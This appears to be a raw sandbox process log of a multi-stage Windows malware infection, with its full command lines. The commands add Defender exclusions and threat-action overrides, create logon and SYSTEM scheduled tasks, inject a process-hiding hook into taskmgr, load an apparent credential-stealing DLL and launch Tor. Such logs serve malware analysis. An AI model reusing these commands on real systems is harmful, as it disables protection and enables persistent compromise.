schtasks /delete /tn ScheduledUpdate /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1364
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe" & exit
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2476 -ip 2476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 872
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHbFtyKwQ"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe\" bH /site_id 525403 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe
"C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"
C:\Users\Admin\AppData\Local\Temp\6DF1.exe
C:\Users\Admin\AppData\Local\Temp\6DF1.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\AppVerif\DllHelper.exe"
C:\Users\Admin\AppVerif\DllHelper.exe
"C:\Users\Admin\AppVerif\DllHelper.exe"
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"
C:\Users\Admin\AppData\Local\Temp\7BCD.exe
C:\Users\Admin\AppData\Local\Temp\7BCD.exe
C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe
"C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"
C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\8AF1.exe
C:\Users\Admin\AppData\Local\Temp\8AF1.exe
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\987E.exe
C:\Users\Admin\AppData\Local\Temp\987E.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2448 -ip 2448
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4404 -ip 4404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 340
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\CE07.exe
C:\Users\Admin\AppData\Local\Temp\CE07.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe
"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"
C:\Windows\SysWOW64\schtasks.exe
/create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Users\Admin\AppData\Local\Temp\EF2C.exe
C:\Users\Admin\AppData\Local\Temp\EF2C.exe
C:\Users\Admin\AppData\Local\Temp\EF2C.exe
C:\Users\Admin\AppData\Local\Temp\EF2C.exe
C:\Users\Admin\AppData\Local\Temp\F576.exe
C:\Users\Admin\AppData\Local\Temp\F576.exe
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
C:\Users\Admin\AppData\Local\Temp\F7E8.exe
C:\Users\Admin\AppData\Local\Temp\F7E8.exe
C:\Users\Admin\AppData\Local\Temp\FB35.exe
C:\Users\Admin\AppData\Local\Temp\FB35.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 24408 -ip 24408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 24408 -s 1132
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
Tal.exe.pif H
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
Tal.exe.pif H
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe
C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe bH /site_id 525403 /S
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\signed.exe
"C:\Users\Admin\AppData\Local\Temp\signed.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:64;"
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
C:\ProgramData\MsDrvSrvc.exe
"C:\ProgramData\MsDrvSrvc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
